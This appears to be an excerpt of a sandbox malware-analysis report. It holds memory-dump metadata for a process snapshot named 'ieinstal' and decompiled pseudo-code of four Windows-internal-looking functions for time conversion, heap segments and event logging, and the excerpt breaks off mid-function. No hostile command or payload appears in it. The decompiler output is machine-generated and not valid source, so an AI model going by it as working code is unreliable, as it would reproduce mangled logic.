0x1f045dc5
0x00000000
0x00000000
0x1f045dcb
0x1f045dcd
0x1f045de6
0x1f045de9
0x1f045deb
0x1f045deb
0x1f045df1
0x1f045df4
0x1f045df5
0x1f045df8
0x1f045dfd
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa52586167b7415d35eda1a572a6da30baa4112b1b33d587e4b9d8ee56c3478
Instruction ID: 9d79711aaf49c4d53b78ec9d00cbbfaf6c63d27ff47eb6abb8a43832de4ce433
Opcode Fuzzy Hash: 8aa52586167b7415d35eda1a572a6da30baa4112b1b33d587e4b9d8ee56c3478
Instruction Fuzzy Hash: A191A175E00215AFCB15CFA5CC94BBEBBB5AF89710F254569E940EB340E736ED009BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFECFB0 Relevance: .2, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E1EFECFB0(short* _a4, signed int* _a8, intOrPtr* _a12) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				short _v46;
				unsigned int _v48;
				char _v56;
				void* _t71;
				signed int _t75;
				signed int _t76;
				void* _t77;
				signed int _t78;
				signed int _t82;
				signed int* _t84;
				char* _t93;
				signed int _t95;
				intOrPtr* _t99;
				signed int* _t104;
				signed int _t105;
				signed int _t106;
				signed int _t108;
				short _t109;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t118;
				signed int _t125;
				signed int* _t126;
				signed int* _t127;
				signed int _t128;
				void* _t129;
				void* _t130;
				signed int _t133;
				signed int _t135;

				_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x470));
				if(_t93 == 0 ||  *_t93 == 0) {
					_t71 = E1EFED051(_a4, _a8);
					goto L8;
				} else {
					_t133 =  *((intOrPtr*)(_t93 + 4));
					_v28 = _t133;
					asm("lock or [eax], ecx");
					_t99 = _a12;
					_t75 =  *( *[fs:0x30] + 0x474) & 0x00000001;
					_v12 = _t75;
					if(_t99 != 0) {
						_v16 =  *_t99;
						_v20 =  *((intOrPtr*)(_t99 + 4));
					} else {
						_v16 = 0;
						_v20 = 0;
					}
					if(_t75 != 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						__eflags = _v48 >> 0x10 - 0x3c;
						if(_v48 >> 0x10 == 0x3c) {
							_t109 = 0x3b;
							_t82 = _t75 | 0x00000002;
							__eflags = _t82;
							_v46 = _t109;
							_v12 = _t82;
						}
						_t76 = E1EFED051( &_v56,  &_v40);
						__eflags = _t76;
						if(_t76 == 0) {
							goto L10;
						}
						_v32 = _v32 & 0x00000000;
						_t77 = 0x989680;
						__eflags = _v28;
						_t135 = _v36;
						_t118 = _v40;
						if(_v28 <= 0) {
							L36:
							_t78 = _v12;
							L37:
							__eflags = _t78 & 0x00000002;
							if((_t78 & 0x00000002) == 0) {
								goto L7;
							}
							__eflags = _t78 - 4;
							if(_t78 < 4) {
								goto L10;
							}
							_t118 = _t118 + 0x989680;
							asm("adc esi, 0x0");
							goto L7;
						}
						_t95 = _t93 + 8;
						__eflags = _t95;
						do {
							_t105 =  *(_t95 + 4);
							_t125 =  *_t95;
							__eflags = _t105;
							if(__eflags < 0) {
								L23:
								_t106 = _t105 & 0x7fffffff;
								_t126 = _t125 - _v16;
								_v24 = _t126;
								asm("sbb ecx, [ebp-0x10]");
								_v24 = _v24 + _t77;
								asm("adc eax, 0x0");
								__eflags = _t135 - _t106;
								if(__eflags < 0) {
									L33:
									__eflags = _t135 - _t106;
									if(__eflags > 0) {
										goto L10;
									}
									if(__eflags < 0) {
										goto L36;
									}
									__eflags = _t118 - _t126;
									if(_t118 >= _t126) {
										goto L10;
									}
									goto L36;
								}
								if(__eflags > 0) {
									L26:
									_t77 = 0x989680;
									_t118 = _t118 - 0x989680;
									asm("sbb esi, 0x0");
									goto L27;
								}
								__eflags = _t118 - _v24;
								if(_t118 < _v24) {
									goto L33;
								}
								goto L26;
							}
							if(__eflags > 0) {
								L19:
								_t127 = _t125 - _v16;
								_v24 = _t127;
								asm("sbb ecx, [ebp-0x10]");
								_v24 = _v24 + _t77;
								asm("adc eax, 0x0");
								__eflags = _t135 - _t105;
								if(__eflags < 0) {
									L29:
									__eflags = _t135 - _t105;
									if(__eflags < 0) {
										goto L36;
									}
									if(__eflags > 0) {
										L32:
										_t78 = _v12 | 0x00000004;
										goto L37;
									}
									__eflags = _t118 - _t127;
									if(_t118 < _t127) {
										goto L36;
									}
									goto L32;
								}
								if(__eflags > 0) {
									L22:
									_t77 = 0x989680;
									_t118 = _t118 + 0x989680;
									asm("adc esi, 0x0");
									goto L27;
								}
								__eflags = _t118 - _v24;
								if(_t118 < _v24) {
									goto L29;
								}
								goto L22;
							}
							__eflags = _t125;
							if(_t125 < 0) {
								goto L23;
							}
							goto L19;
							L27:
							_t95 = _t95 + 8;
							_t108 = _v32 + 1;
							_v32 = _t108;
							__eflags = _t108 - _v28;
						} while (_t108 < _v28);
						goto L36;
					} else {
						if(E1EFED051(_a4,  &_v40) == 0) {
							L10:
							_t71 = 0;
							L8:
							return _t71;
						}
						_t118 = _v40;
						_t135 = _v36;
						_v32 = 0;
						if(_t133 != 0) {
							_t84 = _t93 + 8;
							_v24 = _t84;
							do {
								_t111 = _t84[1];
								_t128 =  *_t84;
								__eflags = _t111;
								if(__eflags < 0) {
									L52:
									_t112 = _t111 & 0x7fffffff;
									_t129 = _t128 - _v16;
									asm("sbb ecx, [ebp-0x10]");
									_v12 = _t129 + 0x989680;
									asm("adc eax, 0x0");
									__eflags = _t135 - _t112;
									if(__eflags < 0) {
										L58:
										__eflags = _t135 - _t112;
										if(__eflags > 0) {
											goto L10;
										}
										if(__eflags < 0) {
											goto L7;
										}
										__eflags = _t118 - _t129;
										if(_t118 >= _t129) {
											goto L10;
										}
										goto L7;
									}
									if(__eflags > 0) {
										L55:
										_t118 = _t118 - 0x989680;
										asm("sbb esi, 0x0");
										goto L56;
									}
									__eflags = _t118 - _v12;
									if(_t118 < _v12) {
										goto L58;
									}
									goto L55;
								}
								if(__eflags > 0) {
									L44:
									_t130 = _t128 - _v16;
									asm("sbb ecx, [ebp-0x10]");
									_v12 = _t130 + 0x989680;
									asm("adc eax, 0x0");
									__eflags = _t135 - _t111;
									if(__eflags < 0) {
										L48:
										__eflags = _t135 - _t111;
										if(__eflags < 0) {
											goto L7;
										}
										if(__eflags > 0) {
											L51:
											_t135 = (_t135 << 0x00000020 | _t118) << 1;
											_t118 = _t118 + _t118 - _t130;
											asm("sbb esi, ecx");
											goto L56;
										}
										__eflags = _t118 - _t130;
										if(_t118 < _t130) {
											goto L7;
										}
										goto L51;
									}
									if(__eflags > 0) {
										L47:
										_t118 = _t118 + 0x989680;
										asm("adc esi, 0x0");
										goto L56;
									}
									__eflags = _t118 - _v12;
									if(_t118 < _v12) {
										goto L48;
									}
									goto L47;
								}
								__eflags = _t128;
								if(_t128 < 0) {
									goto L52;
								}
								goto L44;
								L56:
								_t114 = _v32 + 1;
								_t84 =  &(_v24[2]);
								_v32 = _t114;
								_v24 = _t84;
								__eflags = _t114 - _v28;
							} while (_t114 < _v28);
						}
						L7:
						_t104 = _a8;
						_t71 = 1;
						 *_t104 = _t118;
						_t104[1] = _t135;
						goto L8;
					}
				}
			}

0x1efecfbf
0x1efecfc9
0x1f02ecd3
0x00000000
0x1efecfd8
0x1efecfd8
0x1efecfde
0x1efecfe3
0x1efecfee
0x1efecff7
0x1efecffa
0x1efecfff
0x1efed045
0x1efed048
0x1efed001
0x1efed001
0x1efed004
0x1efed004
0x1efed009
0x1f02eb0a
0x1f02eb0b
0x1f02eb0c
0x1f02eb0d
0x1f02eb14
0x1f02eb18
0x1f02eb1c
0x1f02eb1d
0x1f02eb1d
0x1f02eb20
0x1f02eb24
0x1f02eb24
0x1f02eb2d
0x1f02eb32
0x1f02eb34
0x00000000
0x00000000
0x1f02eb3a
0x1f02eb3e
0x1f02eb43
0x1f02eb47
0x1f02eb4a
0x1f02eb4d
0x1f02ebee
0x1f02ebee
0x1f02ebf1
0x1f02ebf1
0x1f02ebf3
0x00000000
0x00000000
0x1f02ebf9
0x1f02ebfc
0x00000000
0x00000000
0x1f02ec02
0x1f02ec08
0x00000000
0x1f02ec08
0x1f02eb53
0x1f02eb53
0x1f02eb56
0x1f02eb56
0x1f02eb59
0x1f02eb5b
0x1f02eb5d
0x1f02eb8d
0x1f02eb8d
0x1f02eb93
0x1f02eb96
0x1f02eb99
0x1f02eb9c
0x1f02eba1
0x1f02eba4
0x1f02eba6
0x1f02ebdc
0x1f02ebdc
0x1f02ebde
0x00000000
0x00000000
0x1f02ebe4
0x00000000
0x00000000
0x1f02ebe6
0x1f02ebe8
0x00000000
0x00000000
0x00000000
0x1f02ebe8
0x1f02eba8
0x1f02ebaf
0x1f02ebaf
0x1f02ebb4
0x1f02ebb6
0x00000000
0x1f02ebb6
0x1f02ebaa
0x1f02ebad
0x00000000
0x00000000
0x00000000
0x1f02ebad
0x1f02eb5f
0x1f02eb65
0x1f02eb65
0x1f02eb68
0x1f02eb6b
0x1f02eb6e
0x1f02eb73
0x1f02eb76
0x1f02eb78
0x1f02ebca
0x1f02ebca
0x1f02ebcc
0x00000000
0x00000000
0x1f02ebce
0x1f02ebd4
0x1f02ebd7
0x00000000
0x1f02ebd7
0x1f02ebd0
0x1f02ebd2
0x00000000
0x00000000
0x00000000
0x1f02ebd2
0x1f02eb7a
0x1f02eb81
0x1f02eb81
0x1f02eb86
0x1f02eb88
0x00000000
0x1f02eb88
0x1f02eb7c
0x1f02eb7f
0x00000000
0x00000000
0x00000000
0x1f02eb7f
0x1f02eb61
0x1f02eb63
0x00000000
0x00000000
0x00000000
0x1f02ebb9
0x1f02ebbc
0x1f02ebbf
0x1f02ebc0
0x1f02ebc3
0x1f02ebc3
0x00000000
0x1efed00f
0x1efed01c
0x1efed04d
0x1efed04d
0x1efed039
0x1efed03d
0x1efed03d
0x1efed01e
0x1efed023
0x1efed026
0x1efed029
0x1f02ec10
0x1f02ec18
0x1f02ec1b
0x1f02ec1b
0x1f02ec1e
0x1f02ec20
0x1f02ec22
0x1f02ec6c
0x1f02ec6c
0x1f02ec72
0x1f02ec77
0x1f02ec7c
0x1f02ec81
0x1f02ec84
0x1f02ec86
0x1f02ecb2
0x1f02ecb2
0x1f02ecb4
0x00000000
0x00000000
0x1f02ecba
0x00000000
0x00000000
0x1f02ecc0
0x1f02ecc2
0x00000000
0x00000000
0x00000000
0x1f02ecc8
0x1f02ec88
0x1f02ec8f
0x1f02ec8f
0x1f02ec91
0x00000000
0x1f02ec91
0x1f02ec8a
0x1f02ec8d
0x00000000
0x00000000
0x00000000
0x1f02ec8d
0x1f02ec24
0x1f02ec2a
0x1f02ec2a
0x1f02ec2f
0x1f02ec34
0x1f02ec39
0x1f02ec3c
0x1f02ec3e
0x1f02ec4e
0x1f02ec4e
0x1f02ec50
0x00000000
0x00000000
0x1f02ec56
0x1f02ec60
0x1f02ec60
0x1f02ec66
0x1f02ec68
0x00000000
0x1f02ec68
0x1f02ec58
0x1f02ec5a
0x00000000
0x00000000
0x00000000
0x1f02ec5a
0x1f02ec40
0x1f02ec47
0x1f02ec47
0x1f02ec49
0x00000000
0x1f02ec49
0x1f02ec42
0x1f02ec45
0x00000000
0x00000000
0x00000000
0x1f02ec45
0x1f02ec26
0x1f02ec28
0x00000000
0x00000000
0x00000000
0x1f02ec94
0x1f02ec9a
0x1f02ec9b
0x1f02ec9e
0x1f02eca1
0x1f02eca4
0x1f02eca4
0x1f02ecad
0x1efed02f
0x1efed02f
0x1efed032
0x1efed034
0x1efed036
0x00000000
0x1efed036
0x1efed009

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0da4a30da677c789c65780269eb013149ae643dad5dfcbb85a585c03315c678
Instruction ID: 9c3b7646d3090151a7e09924c1a4933627c4c68e1feb27d27c49bd9cc7b3436c
Opcode Fuzzy Hash: a0da4a30da677c789c65780269eb013149ae643dad5dfcbb85a585c03315c678
Instruction Fuzzy Hash: 6C81A432D41119CBDF15CE68C8907AEB7F2EBC4300F5A866ADC16B7744D6356D42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF1EED Relevance: .2, Instructions: 210
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E1EFF1EED(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t102;
				signed int _t107;
				void* _t110;
				char* _t119;
				signed int _t120;
				signed int _t124;
				signed int _t126;
				signed int _t129;
				signed int _t136;
				signed int _t142;
				char _t156;
				intOrPtr _t159;
				signed int _t170;
				signed int _t172;
				void* _t173;
				void* _t175;
				signed int _t179;
				signed int _t184;
				signed int _t185;
				signed int _t191;
				signed int* _t192;
				signed int* _t193;

				_t191 = __ecx;
				_t159 = _a24;
				_t192 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t102 = _t159 - _a16;
				if(_t102 > 0xfffff000) {
					L15:
					return 0;
				}
				asm("cdq");
				_t156 = _a20;
				_v16 = _t102 / 0x1000;
				_t107 = _a4 + 0x00000007 & 0xfffffff8;
				_t179 = _t107 + __edx;
				_v20 = _t107 >> 0x00000003 & 0x0000ffff;
				_t110 = _t179 + 0x28;
				_v12 = _t179;
				if(_t110 >= _t156) {
					if(_t110 >= _t159) {
						goto L15;
					}
					_v8 = _t179 - _t156 + 8;
					if(E1EFF68EA( *((intOrPtr*)(__ecx + 0x1f8)) -  *((intOrPtr*)(__ecx + 0x244)), __ecx, __ecx + 0xd4) == 0) {
						L26:
						 *((intOrPtr*)(_t191 + 0x224)) =  *((intOrPtr*)(_t191 + 0x224)) + 1;
						goto L15;
					}
					_push(E1EFBF0E1(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E1F002B10() < 0) {
						goto L26;
					}
					if(E1EFD3C40() == 0) {
						_t119 = 0x7ffe0380;
					} else {
						_t119 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t119 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E1F07EFD3(_t156, _t191, _a20, _v8, 3);
					}
					_t156 = _a20 + _v8;
					_t159 = _a24;
					_a20 = _t156;
				}
				_t192[0] = 1;
				_t120 = _t159 - _t156;
				_t192[1] = 1;
				asm("cdq");
				_t184 = _t120 % 0x1000;
				_v28 = _t120 / 0x1000;
				 *_t192 = _v20;
				_t192[1] =  *(_t191 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t124 = E1EFEFDB9(1, _t184);
					_t156 = _a20;
					_t192[0xd] = _t124;
				}
				_t192[0xb] = _t192[0xb] & 0x00000000;
				_t185 = _v12;
				_t192[3] = _a12;
				_t126 = _a16;
				_t192[7] = _t126;
				_t170 = _v16 << 0xc;
				_t192[6] = _t191;
				_t192[0xa] = _t126 + _t170;
				_t192[8] = _v16;
				_t129 =  &(_t192[0xe]);
				_t192[2] = 0xffeeffee;
				_t192[9] = _t185;
				 *((intOrPtr*)(_t191 + 0x1f8)) =  *((intOrPtr*)(_t191 + 0x1f8)) + _t170;
				 *((intOrPtr*)(_t191 + 0x1f4)) =  *((intOrPtr*)(_t191 + 0x1f4)) + _t170;
				 *(_t129 + 4) = _t129;
				 *_t129 = _t129;
				_t192[1] = _t129 & 0xffffff00 | _t192[6] != _t192;
				 *(_t185 + 4) =  *_t192 ^  *(_t191 + 0x54);
				if(_t192[6] != _t192) {
					_t136 = (_t185 - _t192 >> 0x10) + 1;
					_v24 = _t136;
					if(_t136 >= 0xfe) {
						_push(0);
						_push(0);
						_push(_t192);
						_push(_t185);
						_t175 = 3;
						E1F085FED(_t175, _t192[6]);
						_t156 = _a20;
						_t185 = _v12;
						_t136 = _v24;
					}
				} else {
					_t136 = 0;
				}
				 *(_t185 + 6) = _t136;
				E1EFD096B(_t191, _t192, _t156 - 0x18, _v28 << 0xc, _t185,  &_v8);
				if( *((intOrPtr*)(_t191 + 0x4c)) != 0) {
					_t192[0] = _t192[0] ^  *_t192 ^ _t192[0];
					 *_t192 =  *_t192 ^  *(_t191 + 0x50);
				}
				if(_v8 != 0) {
					E1EFD0B10(_t191, _v12, _v8);
				}
				_t142 = _t191 + 0xa4;
				_t193 =  &(_t192[4]);
				_t172 =  *(_t142 + 4);
				if( *_t172 != _t142) {
					_push(0);
					_push( *_t172);
					_push(0);
					_push(_t142);
					_t173 = 0xd;
					E1F085FED(_t173, 0);
				} else {
					 *_t193 = _t142;
					_t193[1] = _t172;
					 *_t172 = _t193;
					 *(_t142 + 4) = _t193;
				}
				 *((intOrPtr*)(_t191 + 0x204)) =  *((intOrPtr*)(_t191 + 0x204)) + 1;
				return 1;
			}

0x1eff1f01
0x1eff1f03
0x1eff1f06
0x1eff1f08
0x1eff1f0d
0x1eff1f15
0x1eff2088
0x00000000
0x1eff2088
0x1eff1f1b
0x1eff1f23
0x1eff1f26
0x1eff1f2f
0x1eff1f32
0x1eff1f3b
0x1eff1f3e
0x1eff1f41
0x1eff1f46
0x1f031d85
0x00000000
0x00000000
0x1f031da6
0x1f031db0
0x1f031e2a
0x1f031e2a
0x00000000
0x1f031e2a
0x1f031dbc
0x1f031dc2
0x1f031dc6
0x1f031dc7
0x1f031dcc
0x1f031dcd
0x1f031dd6
0x00000000
0x00000000
0x1f031ddf
0x1f031df1
0x1f031de1
0x1f031dea
0x1f031dea
0x1f031df9
0x1f031e14
0x1f031e14
0x1f031e1c
0x1f031e1f
0x1f031e22
0x1f031e22
0x1eff1f4e
0x1eff1f54
0x1eff1f56
0x1eff1f5a
0x1eff1f60
0x1eff1f62
0x1eff1f68
0x1eff1f74
0x1eff1f7b
0x1f031e38
0x1f031e3d
0x1f031e40
0x1f031e40
0x1eff1f87
0x1eff1f8b
0x1eff1f8e
0x1eff1f91
0x1eff1f94
0x1eff1f97
0x1eff1f9c
0x1eff1f9f
0x1eff1fa5
0x1eff1fa8
0x1eff1fab
0x1eff1fb2
0x1eff1fb5
0x1eff1fbb
0x1eff1fc1
0x1eff1fc4
0x1eff1fcc
0x1eff1fd6
0x1eff1fdd
0x1eff205a
0x1eff205b
0x1eff2063
0x1eff2069
0x1eff206b
0x1eff206d
0x1eff206e
0x1eff2074
0x1eff2075
0x1eff207a
0x1eff207d
0x1eff2080
0x1eff2080
0x1eff1fdf
0x1eff1fdf
0x1eff1fdf
0x1eff1fe1
0x1eff1ff8
0x1eff2001
0x1eff200b
0x1eff2011
0x1eff2011
0x1eff2017
0x1eff2021
0x1eff2021
0x1eff2026
0x1eff202c
0x1eff202f
0x1eff2034
0x1f031e49
0x1f031e4b
0x1f031e4f
0x1f031e51
0x1f031e54
0x1f031e55
0x1eff203a
0x1eff203a
0x1eff203c
0x1eff203f
0x1eff2041
0x1eff2041
0x1eff2044
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd6017033aa2f1d9ced49093e04e4040e25303cd6ebf6b4b38438a257d4a0d1a
Instruction ID: d86c355fa2f1b0b5d7bfa864ad52305ce59acbd8cc5f62ad16b860a66dcb9884
Opcode Fuzzy Hash: fd6017033aa2f1d9ced49093e04e4040e25303cd6ebf6b4b38438a257d4a0d1a
Instruction Fuzzy Hash: 30818B76A00746EFDB14CF69C490B9ABBF5FF48300F10866AE956D7691D730E941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1F03FFDC Relevance: .2, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E1F03FFDC(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = E1EFD5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E1F03FD65(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E1EFD3C40();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E1F002F90();
					_t87 = E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E1F040DCB( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E1F040DCB( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E1F040DCB( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E1F040DCB( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = E1EFD5D90( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E1F03FD65( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E1F03FD65( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E1F03FD65( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E1F03FD65( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E1EFD3C40() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E1F002F90();
								E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = E1EFD3B90( &_v36);
							if(_v24 >= 0) {
								_t87 = E1EFD3B90( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = E1EFD3B90( &_v52);
							}
							if(_v28 >= 0) {
								return E1EFD3B90( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x1f03ffe7
0x1f03fff1
0x1f03fff4
0x1f03fff6
0x1f03fff9
0x1f03fffc
0x1f03ffff
0x1f040002
0x1f040005
0x1f040008
0x1f040011
0x1f040017
0x1f04001c
0x1f040020
0x1f04002b
0x1f04002e
0x1f040035
0x1f040040
0x1f040043
0x1f040049
0x1f040055
0x1f040060
0x1f040063
0x1f040068
0x1f04006f
0x1f040081
0x1f040071
0x1f04007a
0x1f04007a
0x1f040086
0x1f040087
0x1f04008a
0x1f04008f
0x1f040090
0x1f0400a1
0x1f0400a6
0x1f0400af
0x1f0400bb
0x1f0400be
0x1f0400bf
0x1f0400c6
0x1f0400e0
0x1f0400ef
0x1f0400f5
0x1f0400f8
0x1f040105
0x1f04010e
0x1f040114
0x1f040119
0x1f04011e
0x1f040124
0x1f04012d
0x1f040135
0x1f040139
0x1f040139
0x1f040146
0x1f040154
0x1f040157
0x1f04015a
0x1f040167
0x1f040178
0x1f04018a
0x1f04018f
0x1f040195
0x1f0401a4
0x1f0401ac
0x1f0401b6
0x1f0401c1
0x1f0401c1
0x1f0401cd
0x1f0401ce
0x1f0401cf
0x1f0401d4
0x1f0401d5
0x1f0401e6
0x1f0401eb
0x1f0401eb
0x1f0401f2
0x1f0401fb
0x1f040201
0x1f040201
0x1f040208
0x1f04020e
0x1f04020e
0x1f040217
0x00000000
0x1f04021d
0x1f040217
0x1f0400c6
0x1f0400af
0x1f040226

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dbc9b8f6ca34978a445ea77d035b2b09001d3566f33c20ef046d4ce11677101
Instruction ID: 2ae42c7522c115635ad1916c07990c4291fde46eec13552a11e86f1354be8a86
Opcode Fuzzy Hash: 4dbc9b8f6ca34978a445ea77d035b2b09001d3566f33c20ef046d4ce11677101
Instruction Fuzzy Hash: 97714B75E00609AFDB10CFA4C994B9EBBB9FF48700F14456AE945E7290EB34FA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1F055E30 Relevance: .2, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E1F055E30(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1f0b5d78; // 0x0
				_t124 = E1EFD5D90(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E1F002CB0();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E1F002A60();
									if( *_t107 != 0) {
										_push( *_t107);
										E1F002A80();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								E1EFD3BC0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
